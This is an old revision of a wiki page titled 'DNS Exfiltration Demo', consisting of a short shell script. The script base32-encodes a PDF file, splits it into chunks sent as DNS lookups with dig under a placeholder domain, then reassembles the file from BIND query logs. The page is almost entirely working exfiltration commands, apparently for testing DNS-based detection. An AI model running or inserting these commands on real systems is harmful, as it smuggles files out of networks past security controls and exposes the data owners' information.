dns:dns_exfiltration
This is an old revision of the document!
DNS Exfiltration Demo
SOURCE=/home/name/dns_exfil_test/releasenotes.pdf
ENCRYPTED=/home/name/dns_exfil_test/encryptedpdf.txt
ENCRYPTED2=/home/name/dns_exfil_test/encryptedpdf2.txt
DOMAIN=domain.com
SUBDOM=asdf
LOCALDNS=protectivedns.example.com
BIND_LOG_FILE=/var/log/named/query.log
DECRYPTEDOUTPUT=/home/name/dns_exfil_test/releasenotes2.pdf
# Encrypt source file into Base32 and then split into strings of 32 characters each. Then suffix on the domain to query.
base32 $SOURCE | tr -d '\n' | fold -32 | sed -e "s/$/.$SUBDOM.$DOMAIN/" > $ENCRYPTED
# Use DIG to iterate over the file and resolve the DNS.
dig +short A @$LOCALDNS -f $ENCRYPTED
OR
for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 1;done
# Parse DNS Server logs, extract queries to exfiltration domain
cat $BIND_LOG_FILE | grep $SUBDOM.$DOMAIN | awk -F " " '{print $8}' | sed s/\(//g | sed s/\)://g > $ENCRYPTED2
# Convert back from Base32 and recreate original file.
cat $ENCRYPTED2 | tr -d '\n' | base32 --decode > $DECRYPTEDOUTPUT
dns/dns_exfiltration.1685215133.txt.gz · Last modified: by bstafford